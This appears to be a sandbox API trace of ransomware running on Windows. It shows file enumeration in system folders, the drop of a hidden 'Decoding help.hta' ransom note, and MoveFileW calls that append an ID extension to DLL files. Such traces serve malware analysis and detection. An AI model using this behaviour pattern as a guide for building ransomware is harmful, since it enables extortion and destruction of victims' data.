lpFindFileData=0x1cbdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9ffc4e3, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xb9ffc4e3, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x9bc4c8f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x46000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaprst.dll", cAlternateFileName="")) returned 1 [0059.022] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.023] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.023] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" [0059.023] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.023] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdaprst.dll") returned -1 [0059.023] lstrlenW (lpString="msdaprst.dll") returned 12 [0059.023] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.023] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.023] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="msdaprst.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprst.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprst.dll" [0059.023] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprst.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprst.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprst.dll" [0059.023] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprst.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprst.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprst.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.023] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprst.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdaprst.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprst.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdaprst.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.023] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x1cbdfd30 | out: lpFindFileData=0x1cbdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d87fee9, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9d87fee9, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9d87fee9, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2f000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdarem.dll", cAlternateFileName="")) returned 1 [0059.023] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.023] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.023] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" [0059.023] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.023] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdarem.dll") returned -1 [0059.023] lstrlenW (lpString="msdarem.dll") returned 11 [0059.023] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.023] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.023] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="msdarem.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdarem.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdarem.dll" [0059.024] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdarem.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdarem.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdarem.dll" [0059.024] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdarem.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdarem.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdarem.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.024] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdarem.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdarem.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdarem.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdarem.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.024] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x1cbdfd30 | out: lpFindFileData=0x1cbdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb10b7c86, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xb10b7c86, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x60b01450, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaremr.dll", cAlternateFileName="")) returned 1 [0059.024] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.024] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.024] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" [0059.024] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.024] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdaremr.dll") returned -1 [0059.024] lstrlenW (lpString="msdaremr.dll") returned 12 [0059.024] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.024] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.024] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="msdaremr.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaremr.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaremr.dll" [0059.024] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaremr.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaremr.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaremr.dll" [0059.024] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaremr.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaremr.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaremr.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.024] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaremr.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdaremr.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaremr.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdaremr.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.025] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x1cbdfd30 | out: lpFindFileData=0x1cbdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8558a3c0, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8558a3c0, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x855fc7e1, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdfmap.dll", cAlternateFileName="")) returned 1 [0059.025] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.025] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.025] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" [0059.025] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.025] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdfmap.dll") returned -1 [0059.025] lstrlenW (lpString="msdfmap.dll") returned 11 [0059.025] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.025] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.025] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="msdfmap.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdfmap.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdfmap.dll" [0059.025] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdfmap.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdfmap.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdfmap.dll" [0059.025] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdfmap.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdfmap.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdfmap.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.025] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdfmap.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdfmap.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdfmap.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdfmap.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.026] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x1cbdfd30 | out: lpFindFileData=0x1cbdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8558a3c0, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8558a3c0, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x855fc7e1, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdfmap.dll", cAlternateFileName="")) returned 0 [0059.026] FindClose (in: hFindFile=0x5e3570 | out: hFindFile=0x5e3570) returned 1 Thread: id = 440 os_tid = 0xbcc [0044.433] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*", lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f34af90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f34af90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3030 [0044.459] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.459] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f34af90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f34af90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.459] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.459] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.459] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea1accb, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0044.459] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0044.459] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0044.459] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0044.462] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.462] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.462] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US" [0044.462] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*" [0044.462] GlobalMemoryStatus (in: lpBuffer=0x1cd1fd10 | out: lpBuffer=0x1cd1fd10) [0044.462] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11741c80, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x70c [0044.463] CloseHandle (hObject=0x70c) returned 1 [0044.463] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad7e30c4, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xad7e30c4, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x9bb42720, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdadc.dll", cAlternateFileName="")) returned 1 [0044.463] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.463] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.463] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.463] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0xffffffff [0044.463] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x70c [0044.464] WriteFile (in: hFile=0x70c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1cd1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1cd1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0044.465] CloseHandle (hObject=0x70c) returned 1 [0044.465] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0044.466] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdadc.dll") returned -1 [0044.466] lstrlenW (lpString="msdadc.dll") returned 10 [0044.466] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.466] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.466] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="msdadc.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdadc.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdadc.dll" [0044.466] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdadc.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdadc.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdadc.dll" [0044.466] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdadc.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdadc.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdadc.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdadc.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdadc.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdadc.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdadc.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.467] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadbe75c9, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xadbe75c9, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x9bb67110, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaenum.dll", cAlternateFileName="")) returned 1 [0044.467] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.467] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.467] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.467] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.467] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdaenum.dll") returned -1 [0044.467] lstrlenW (lpString="msdaenum.dll") returned 12 [0044.467] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.467] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.468] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="msdaenum.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaenum.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaenum.dll" [0044.468] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaenum.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaenum.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaenum.dll" [0044.468] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaenum.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaenum.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaenum.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.468] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaenum.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaenum.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaenum.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaenum.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.468] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad8554e1, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xad8554e1, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x9bb67110, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaer.dll", cAlternateFileName="")) returned 1 [0044.468] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" 